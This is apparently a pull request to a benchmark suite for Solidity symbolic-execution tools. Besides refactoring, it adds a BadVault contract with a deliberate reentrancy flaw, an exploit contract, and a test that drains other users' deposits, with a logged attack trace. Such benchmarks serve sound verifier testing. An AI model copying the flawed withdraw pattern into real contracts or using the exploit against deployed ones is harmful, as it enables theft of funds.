### PR TITLE
Function singnatures, cleanup of benchmarks, renaming of clashing test names, test patterns, more complete DB

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,4 @@ out/
 tags
 *.eps
 *.db
+graphs/

--- a/bench.py
+++ b/bench.py
@@ -66,7 +66,7 @@ def printable_output(out):
     return ("%s" % out).replace('\\n', '\n').replace('\\t', '\t')
 
 
-def get_signature(fun: str, inputs: dict) -> str:
+def get_signature(fun: str, inputs) -> str:
     ret = [e["internalType"] for e in inputs]
 
     args = ",".join(ret)

--- a/bench.py
+++ b/bench.py
@@ -335,8 +335,7 @@ def dump_results(solvers_results: dict[str, list[Result]], fname: str):
     with open("%s.json" % fname, "w") as f:
         f.write(json.dumps(solvers_results, indent=2, cls=ResultEncoder))
     with open("%s.csv" % fname, "w", newline='') as f:
-        # csvwriter = csv.writer(f, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)
-        fieldnames = ["solver", "solc_version", "name", "result", "correct", "t", "timeout", "memMB", "exit_status", "output"]
+        fieldnames = ["solver", "solc_version", "name", "fun", "sig", "result", "correct", "t", "timeout", "memMB", "exit_status", "output"]
         writer = csv.DictWriter(f, fieldnames=fieldnames)
         writer.writeheader()
         for solver, results in solvers_results.items():
@@ -346,7 +345,8 @@ def dump_results(solvers_results: dict[str, list[Result]], fname: str):
                     corr_as_sqlite = (int)(r.result == r.case.expected)
                 writer.writerow({
                     "solver": solver, "solc_version": opts.solc_version,
-                    "name": r.case.get_name(), "result": r.result,
+                    "name": r.case.get_name(), "fun": r.case.fun,
+                    "sig": r.case.sig, "result": r.result,
                     "correct": corr_as_sqlite, "t": empty_if_none(r.t),
                     "timeout": r.tout, "memMB": empty_if_none(r.mem_used_MB),
                     "exit_status": empty_if_none(r.exit_status), "output": r.out})

--- a/bench.py
+++ b/bench.py
@@ -395,7 +395,7 @@ def main() -> None:
     opts.timestamp = strftime("%Y-%m-%d-%H:%M", gmtime())
     cases = gather_cases()
     cases.sort(key=lambda contr: contr.get_name())
-    print("Cases gathered given test pattern '%s': " % opts.testpattern)
+    print(f"Cases gathered given test pattern '{opts.testpattern}':")
     for c in cases:
         print("-> %s" % c)
     random.shuffle(cases)

--- a/bench.py
+++ b/bench.py
@@ -159,11 +159,8 @@ def gather_cases() -> list[Case]:
                 if sol_file.startswith("src/common/") or sol_file.startswith("lib/"):
                     continue
                 ds_test = determine_dstest(sol_file)
-                if ds_test:
-                    for f in get_relevant_funcs(js):
-                        cases.append(Case(c, json_fname, sol_file, True, f))
-                else:
-                    cases.append(Case(c, json_fname, sol_file, False, ""))
+                for f in get_relevant_funcs(js):
+                   cases.append(Case(c, json_fname, sol_file, ds_test, f))
     return cases
 
 

--- a/bench.py
+++ b/bench.py
@@ -70,7 +70,7 @@ def get_signature(fun: str, inputs: dict) -> str:
     ret = [e["internalType"] for e in inputs]
 
     args = ",".join(ret)
-    return "%s(%s)" % (fun, args)
+    return f"{fun}({args})"
 
 
 # get all functions that start with 'prove' or 'check'

--- a/bench.py
+++ b/bench.py
@@ -66,7 +66,7 @@ def printable_output(out):
     return ("%s" % out).replace('\\n', '\n').replace('\\t', '\t')
 
 
-def get_sigature(fun: str, inputs: dict) -> str:
+def get_signature(fun: str, inputs: dict) -> str:
     ret = []
     for e in inputs:
         ret.append(e["internalType"])

--- a/bench.py
+++ b/bench.py
@@ -385,7 +385,7 @@ def main() -> None:
     opts.timestamp = strftime("%Y-%m-%d-%H:%M", gmtime())
     cases = gather_cases()
     cases.sort(key=lambda contr: contr.get_name())
-    print("Cases gathered: ")
+    print("Cases gathered given test pattern '%s': " % opts.testpattern)
     for c in cases:
         print("-> %s" % c)
     random.shuffle(cases)

--- a/bench.py
+++ b/bench.py
@@ -80,7 +80,7 @@ def get_relevant_funcs(js) -> list[(str,str)]:
         if "name" not in js["abi"][i]:
             continue
         fun = js["abi"][i]["name"]
-        sig = get_sigature(fun, js["abi"][i]["inputs"])
+        sig = get_signature(fun, js["abi"][i]["inputs"])
         if re.match("^prove", fun) or re.match("^check", fun):
             ret.append((fun, sig))
 

--- a/bench.py
+++ b/bench.py
@@ -67,9 +67,7 @@ def printable_output(out):
 
 
 def get_signature(fun: str, inputs: dict) -> str:
-    ret = []
-    for e in inputs:
-        ret.append(e["internalType"])
+    ret = [e["internalType"] for e in inputs]
 
     args = ",".join(ret)
     return "%s(%s)" % (fun, args)

--- a/create_table.sql
+++ b/create_table.sql
@@ -2,6 +2,8 @@ CREATE TABLE IF NOT EXISTS results (
   solver STRING NOT NULL,
   solc_version STRING NOT NULL,
   name STRING NOT NULL,
+  fun STRING NOT NULL,
+  sig STRING NOT NULL,
   result STRING NOT NULL,
 
   correct INT,

--- a/src/safe/1tx-abstract/Foo.t.sol
+++ b/src/safe/1tx-abstract/Foo.t.sol
@@ -14,25 +14,9 @@ contract FooTest is Test {
     /// @dev Attempts to find a combination of `x` and `y` that will cause
     /// this test to revert. In order to do so, both `x` and `y` should
     /// be equal to `0x69`.
-    function testFuzz_cracked(uint256 x, uint256 y) public {
-        a.foo(x);
-        a.bar(y);
-        a.revertIfCracked();
-    }
-
     function proveFuzz_cracked(uint256 x, uint256 y) public {
         a.foo(x);
         a.bar(y);
         a.revertIfCracked();
     }
-
-    /*
-    function testFuzz_cracked_k(uint256 x, uint256 y) public {
-        setUp();
-
-        a.foo(x);
-        a.bar(y);
-        a.revertIfCracked();
-    }
-    */
 }

--- a/src/safe/1tx-abstract/FooBytes.t.sol
+++ b/src/safe/1tx-abstract/FooBytes.t.sol
@@ -14,25 +14,9 @@ contract FooBytesTest is Test {
     /// @dev Attempts to find a combination of `x` and `y` that will cause
     /// this test to revert. In order to do so, both `x` and `y` should
     /// have `0x69` in their lowest byte.
-    function testFuzz_cracked(bytes32 x, bytes32 y) public {
-        a.foo(x);
-        a.bar(y);
-        a.revertIfCracked();
-    }
-
     function proveFuzz_cracked(bytes32 x, bytes32 y) public {
         a.foo(x);
         a.bar(y);
         a.revertIfCracked();
     }
-
-    /*
-    function testFuzz_cracked_k(bytes32 x, bytes32 y) public {
-        setUp();
-
-        a.foo(x);
-        a.bar(y);
-        a.revertIfCracked();
-    }
-    */
 }

--- a/src/safe/1tx-abstract/MiniVat.t.sol
+++ b/src/safe/1tx-abstract/MiniVat.t.sol
@@ -12,15 +12,6 @@ contract MiniVatTest is Test {
         vat.init();
     }
 
-    function testInvariant() public {
-        vat.frob(10 ** 18);
-        vat.fold(-10 ** 27);
-        vat.init();
-
-        (uint Art, uint rate, uint debt) = vat.getValues();
-        assertEq(debt, Art * rate);
-    }
-
     function proveInvariant() public {
         vat.frob(10 ** 18);
         vat.fold(-10 ** 27);
@@ -29,25 +20,4 @@ contract MiniVatTest is Test {
         (uint Art, uint rate, uint debt) = vat.getValues();
         assertEq(debt, Art * rate);
     }
-
-    /*
-    function testInvariant_k() public {
-        setUp();
-
-        vat.frob(10 ** 18);
-        vat.fold(-10 ** 27);
-        vat.init();
-
-        (uint Art, uint rate, uint debt) = vat.getValues();
-        assertEq(debt, Art * rate);
-    }
-
-    function testCounterexample() public {
-        vat.counterexample();
-    }
-
-    function proveCounterexample() public {
-        vat.counterexample();
-    }
-    */
 }

--- a/src/safe/1tx-abstract/PostExample.t.sol
+++ b/src/safe/1tx-abstract/PostExample.t.sol
@@ -11,18 +11,7 @@ contract PostExampleTest is Test {
         example = new PostExample();
     }
 
-    function testBackdoor(uint256 x) public view {
-        example.backdoor(x);
-    }
-
     function proveBackdoor(uint256 x) public view {
         example.backdoor(x);
     }
-
-    /*
-    function testBackdoor_k(uint256 x) public {
-        setUp();
-        example.backdoor(x);
-    }
-    */
 }

--- a/src/safe/1tx-abstract/PostExample_2tx_setLive.t.sol
+++ b/src/safe/1tx-abstract/PostExample_2tx_setLive.t.sol
@@ -22,12 +22,4 @@ contract PostExampleTwoLiveTest is Test {
         example.setLive(isLive);
         example.backdoor(x);
     }
-
-    /*
-    function testBackdoor_k(bool isLive, uint256 x) public {
-        setUp();
-        example.setLive(isLive);
-        example.backdoor(x);
-    }
-    */
 }

--- a/src/safe/1tx-abstract/addmod-no-overflow.sol
+++ b/src/safe/1tx-abstract/addmod-no-overflow.sol
@@ -2,7 +2,7 @@
 
 pragma solidity ^0.8.17;
 
-contract MyContract {
+contract MyContractAddMod {
   function prove_addmod_no_overflow(uint8 a, uint8 b, uint8 c) external pure {
     require(a < 4);
     require(b < 4);

--- a/src/safe/1tx-abstract/different_length_keccak_test.sol
+++ b/src/safe/1tx-abstract/different_length_keccak_test.sol
@@ -1,0 +1,14 @@
+// SPDX-License-Identifier: AGPL-3.0-or-later
+// submitted by @karmacoma on 3 Aug 2023
+
+pragma solidity ^0.8.17;
+
+contract MyKeccakTest {
+    // we expect this to pass, there are no counterexamples
+    function prove_keccakMeditations_mixedSizes1(uint128 x, uint256 y) external pure {
+        assert(
+            keccak256(abi.encodePacked(x)) !=
+            keccak256(abi.encodePacked(y))
+        );
+    }
+}

--- a/src/safe/1tx-abstract/mulmod-no-overflow.sol
+++ b/src/safe/1tx-abstract/mulmod-no-overflow.sol
@@ -2,7 +2,7 @@
 
 pragma solidity ^0.8.17;
 
-contract MyContract {
+contract MyContractMulMod {
   function proveFun(uint8 a, uint8 b, uint8 c) external pure {
     require(a < 4);
     require(b < 4);

--- a/src/safe/1tx-abstract/opcode-div-zero-2.sol
+++ b/src/safe/1tx-abstract/opcode-div-zero-2.sol
@@ -2,7 +2,7 @@
 
 pragma solidity ^0.8.17;
 
-contract MyContract {
+contract MyContractDiv {
   function prove_fun(uint256 val) external pure {
     uint out;
     assembly {

--- a/src/safe/ds-test/dsProvePass.sol
+++ b/src/safe/ds-test/dsProvePass.sol
@@ -10,7 +10,7 @@ contract ConstructorArg {
     }
 }
 
-contract SolidityTest is DSTest {
+contract SolidityTestPass is DSTest {
     ERC20 token;
 
     function setUp() public {
@@ -29,7 +29,7 @@ contract SolidityTest is DSTest {
         assert(supply == actual);
     }
 
-    function prove_constructorArgs(address b) public {
+    function prove_constrArgs(address b) public {
         ConstructorArg c = new ConstructorArg(b);
         assert(b == c.a());
     }

--- a/src/unsafe/ds-test/10_BadVault.t.sol
+++ b/src/unsafe/ds-test/10_BadVault.t.sol
@@ -1,0 +1,266 @@
+// SPDX-License-Identifier: MIT
+// contributed by @karmacoma on 5 Aug 2023
+
+pragma solidity ^0.8.15;
+
+import "forge-std/Test.sol";
+import {console2} from "forge-std/console2.sol";
+
+// inspired by the classic reentrancy level in Ethernaut CTF
+contract BadVault {
+    mapping(address => uint256) public balance;
+
+    function deposit() external payable {
+        balance[msg.sender] += msg.value;
+
+        console2.log("deposit", msg.sender, msg.value);
+    }
+
+    function withdraw(uint256 amount) external {
+        // checks
+        uint256 _balance = balance[msg.sender];
+        require(_balance >= amount, "insufficient balance");
+
+        console2.log("withdraw", msg.sender, amount);
+
+        // interactions
+        (bool success,) = msg.sender.call{value: amount}("");
+        require(success, "transfer failed");
+
+        // effects
+        balance[msg.sender] = _balance - amount;
+    }
+}
+
+// from https://github.com/mds1/multicall
+struct Call3Value {
+    address target;
+    uint256 value;
+    bytes data;
+}
+
+contract ExploitLaunchPad {
+    address public owner;
+    bool reentered;
+
+    Call3Value public call;
+
+    constructor() {
+        owner = msg.sender;
+    }
+
+    receive() external payable {
+        if (reentered) {
+            return;
+        }
+
+        require(call.value <= address(this).balance, "insufficient balance");
+
+        reentered = true;
+        (bool success,) = call.target.call{value: call.value}(call.data);
+        reentered = false;
+    }
+
+    function defer(Call3Value calldata _call) external payable {
+        require(msg.sender == owner, "only owner");
+        call = _call;
+    }
+
+    function go(Call3Value calldata _call)
+        external
+        payable
+    {
+        require(msg.sender == owner, "only owner");
+        require(_call.value <= address(this).balance, "insufficient balance");
+
+        (bool success,) = _call.target.call{value: _call.value}(_call.data);
+    }
+
+    function deposit() external payable {}
+
+    function withdraw() external {
+        owner.call{value: address(this).balance}("");
+    }
+}
+
+contract BadVaultTest is Test {
+    BadVault vault;
+    ExploitLaunchPad exploit;
+
+    address user1;
+    address user2;
+    address attacker;
+
+    function setUp() public {
+        vault = new BadVault();
+
+        user1 = address(1);
+        user2 = address(2);
+
+        vm.deal(user1, 1 ether);
+        vm.prank(user1);
+        vault.deposit{value: 1 ether}();
+
+        vm.deal(user2, 1 ether);
+        vm.prank(user2);
+        vault.deposit{value: 1 ether}();
+
+        attacker = address(42);
+        vm.prank(attacker);
+        exploit = new ExploitLaunchPad();
+
+        assert(exploit.owner() == attacker);
+    }
+
+    /// passes as expected
+    /// @custom:halmos --array-lengths data=100
+    function test_BadVault_withdrawFromEOA(address attacker, uint256 amount, bytes memory data) external {
+        uint256 STARTING_BALANCE = 2 ether;
+
+        vm.assume(attacker != address(vault));
+        vm.assume(attacker != address(user1));
+        vm.assume(attacker != address(user2));
+        vm.assume(attacker.balance == STARTING_BALANCE);
+        vm.assume(amount <= STARTING_BALANCE / 2);
+
+        // attacker starts with some ether
+        vm.prank(attacker);
+        vault.deposit{value: STARTING_BALANCE / 2}();
+
+        // whatever interaction with the vault the attacker does
+        vm.prank(attacker);
+        address(vault).call{value: amount}(data);
+
+        // they can not end up with more ether than they started with
+        assert(address(attacker).balance <= STARTING_BALANCE);
+    }
+
+    /// won't run because we don't support symbolic CREATE
+    /// @custom:halmos --array-lengths data=100,code=100
+    function test_BadVault_withdrawFromContract(
+        address attacker,
+        uint256 amount1,
+        uint256 amount2,
+        bytes memory data,
+        bytes memory code
+    ) external {
+        uint256 STARTING_BALANCE = 2 ether;
+
+        vm.assume(attacker != address(vault));
+        vm.assume(attacker != address(user1));
+        vm.assume(attacker != address(user2));
+        vm.assume(attacker.balance == STARTING_BALANCE);
+        vm.assume((amount1 + amount2) <= STARTING_BALANCE);
+
+        // attacker deploys code
+        address attackContract;
+        vm.prank(attacker);
+        assembly {
+            let ptr := add(code, 0x20)
+            let size := mload(code)
+            attackContract := create(amount1, ptr, size)
+            if iszero(extcodesize(attackContract)) { revert(0, 0) }
+        }
+
+        // attacker interacts with deployed code
+        vm.prank(attacker);
+        attackContract.call{value: amount2}(data);
+
+        // they can not end up with more ether than they started with
+        console2.log("attacker final balance", address(attacker).balance);
+        assert(address(attacker).balance <= STARTING_BALANCE);
+    }
+
+    /// I would expect to find a solution, but we get Counterexample: unknown
+    /// @custom:halmos --array-lengths data1=36,data2=36,deferredData=36
+    function prove_BadVault_usingExploitLaunchPad(
+        address target1,
+        uint256 amount1,
+        bytes memory data1,
+
+        address target2,
+        uint256 amount2,
+        bytes memory data2,
+
+        address deferredTarget,
+        uint256 deferredAmount,
+        bytes memory deferredData
+
+    ) public {
+        uint256 STARTING_BALANCE = 2 ether;
+        vm.deal(attacker, STARTING_BALANCE);
+
+        vm.assume(address(exploit).balance == 0);
+        vm.assume((amount1 + amount2) <= STARTING_BALANCE);
+
+        console2.log("attacker starting balance", address(attacker).balance);
+        vm.prank(attacker);
+        exploit.deposit{value: STARTING_BALANCE}();
+
+        vm.prank(attacker);
+        exploit.go(Call3Value({
+            target: target1,
+            value: amount1,
+            data: data1
+        }));
+
+        vm.prank(attacker);
+        exploit.defer(Call3Value({
+            target: deferredTarget,
+            value: deferredAmount,
+            data: deferredData
+        }));
+
+        vm.prank(attacker);
+        exploit.go(Call3Value({
+            target: target2,
+            value: amount2,
+            data: data2
+        }));
+
+        vm.prank(attacker);
+        exploit.withdraw();
+
+        // they can not end up with more ether than they started with
+        console2.log("attacker final balance", address(attacker).balance);
+        assert(attacker.balance <= STARTING_BALANCE);
+    }
+
+    // running `halmos --function test_BadVault_solution`
+    // gives the expected `Counterexample: ∅`
+    //
+    // running `forge test --match-test test_BadVault_solution -vvv` confirms the attack trace:                                                                                                                                                                            took 6s Node system at 18:00:43
+    //   deposit 0x0000000000000000000000000000000000000001 1000000000000000000
+    //   deposit 0x0000000000000000000000000000000000000002 1000000000000000000
+    //   attacker starting balance 2000000000000000000
+    //   deposit 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   withdraw 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   withdraw 0x5f4E4CcFF0A2553b2BDE30e1fC8531B287db9087 1000000000000000000
+    //   attacker final balance 3000000000000000000
+    function test_BadVault_solution() public {
+        prove_BadVault_usingExploitLaunchPad(
+            // 1st call
+            address(vault),
+            1 ether,
+            abi.encodeWithSelector(
+                vault.deposit.selector
+            ),
+
+            // 2nd call
+            address(vault),
+            0 ether,
+            abi.encodeWithSelector(
+                vault.withdraw.selector,
+                1 ether
+            ),
+
+            // deferred call
+            address(vault),
+            0 ether,
+            abi.encodeWithSelector(
+                vault.withdraw.selector,
+                1 ether
+            )
+        );
+    }
+}

--- a/src/unsafe/ds-test/10_BadVault.t.sol
+++ b/src/unsafe/ds-test/10_BadVault.t.sol
@@ -166,9 +166,6 @@ contract BadVaultTest is Test {
         assert(attacker.balance <= STARTING_BALANCE);
     }
 
-    // running `halmos --function test_BadVault_solution`
-    // gives the expected `Counterexample: ∅`
-    //
     // running `forge test --match-test test_BadVault_solution -vvv` confirms the attack trace:                                                                                                                                                                            took 6s Node system at 18:00:43
     //   deposit 0x0000000000000000000000000000000000000001 1000000000000000000
     //   deposit 0x0000000000000000000000000000000000000002 1000000000000000000

--- a/src/unsafe/ds-test/dsProveFail.sol
+++ b/src/unsafe/ds-test/dsProveFail.sol
@@ -12,7 +12,7 @@ contract Withdraw {
     }
 }
 
-contract SolidityTest is DSTest {
+contract SolidityTestFail is DSTest {
     ERC20 token;
     Withdraw withdraw;
 

--- a/src/unsafe/ds-test/dsProveFail2.sol
+++ b/src/unsafe/ds-test/dsProveFail2.sol
@@ -3,7 +3,7 @@ pragma solidity ^0.8.19;
 import "ds-test/test.sol";
 import "src/common/erc20.sol";
 
-contract SolidityTest is DSTest {
+contract SolidityTestFail2 is DSTest {
     ERC20 token;
 
     function setUp() public {

--- a/tools/halmos.sh
+++ b/tools/halmos.sh
@@ -5,6 +5,7 @@ set -x
 contract_file="$1" ; shift
 contract_name="$1" ; shift
 fun_name="$1"; shift
+sig="$1"; shift
 ds_test="$1"; shift
 tout="$1"; shift
 

--- a/tools/hevm.sh
+++ b/tools/hevm.sh
@@ -5,6 +5,7 @@ set -x
 contract_file="$1" ; shift
 contract_name="$1" ; shift
 fun_name="$1"; shift
+sig="$1"; shift
 ds_test="$1"; shift
 tout="$1"; shift
 
@@ -13,7 +14,7 @@ source "$SCRIPT_DIR/utils.sh"
 
 if [[ "${ds_test}" == "0" ]]; then
     code=$(get_runtime_bytecode "${contract_file}" "${contract_name}")
-    out=$(doalarm -t real "${tout}" hevm symbolic --code "${code}" "$@")
+    out=$(doalarm -t real "${tout}" hevm symbolic --code "${code}" --sig "${sig}" "$@")
 elif [[ "${ds_test}" == "1" ]]; then
     out=$(doalarm -t real "${tout}" hevm test --match "${contract_file}.*${fun_name}" "$@")
 else

--- a/tools/hevm.sh
+++ b/tools/hevm.sh
@@ -28,6 +28,11 @@ if [[ $out =~ "[FAIL]" ]]; then
   exit 0
 fi
 
+if [[ $out =~ "hevm was only able to partially explore the given contract" ]]; then
+    echo "unknown"
+    exit 0
+fi
+
 if [[ $out =~ "[PASS]" ]]; then
   echo "result: safe"
   exit 0


### PR DESCRIPTION
This fixes/adds:
* Function signatures are now passed to the solvers. This was missing and is required for HEVM to only explore the specific functions for non-dstest contracts
* Benchmarks had unused code (e.g. "test..." where we had a "prove..."), and some had commented-out code. Fixed.
* Benchmarks sometimes clashed on contract names. This has been fixed
* Case printing is a lot cleaner now
* Graphs subdirectory is now ignored in `.gitignore`
* Tests can be selectively run using `--tests REGEX`
* HEVM shell scripts marks test as UNKNOWN when we can only partially execute it due to e.g. call to symbolic code
* A test for the keccak length issue has been added.
* BadVault test by @karmacoma-eth 

Warning: this is a **breaking change**, the database now contains the function name and the signature as well. This is hopefully the last breaking change.